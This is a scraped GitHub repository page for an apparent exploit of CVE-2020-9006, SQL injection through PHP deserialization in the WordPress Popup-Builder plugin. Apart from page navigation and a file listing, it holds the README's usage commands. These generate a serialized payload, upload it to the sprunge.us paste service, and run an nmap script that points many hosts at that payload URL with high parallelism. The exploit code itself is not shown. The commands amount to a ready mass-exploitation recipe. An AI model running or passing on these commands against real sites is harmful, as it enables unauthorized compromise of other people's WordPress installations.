CVE-2020-9006: Wordpress Popup-Builder Plugin Exploit

Usage:

# Create and upload payload
# Also see: php create-serialized-payload.php -h
$ php create-serialized-payload.php | curl -F 'sprunge=<-' http://sprunge.us
http://sprunge.us/XXXXXX

# Run exploit
$ nmap --script ./cve-2020-9006 --script-args http.useragent='Mozilla/5.0',payload-url='http://sprunge.us/XXXXXX
' --min-parallelism 64 --min-rate 1000 --max-retries 1 -p 80,443 -oX report.xml -d ...hosts

Links

CVE-2020-9006 – popup-builder WP Plugin SQL injection via PHP Deserialization

Name		Name	Last commit message	Last commit date
Latest commit History 11 Commits
.vscode		.vscode
.gitignore		.gitignore
README.md		README.md
create-serialized-payload.php		create-serialized-payload.php
cve-2020-9006.nse		cve-2020-9006.nse

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2020-9006: Wordpress Popup-Builder Plugin Exploit

Links

About

Releases

Packages

Contributors 2

Languages

s3rgeym/cve-2020-9006

Folders and files

Latest commit

History

Repository files navigation

CVE-2020-9006: Wordpress Popup-Builder Plugin Exploit

Links

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Contributors 2

Languages

Packages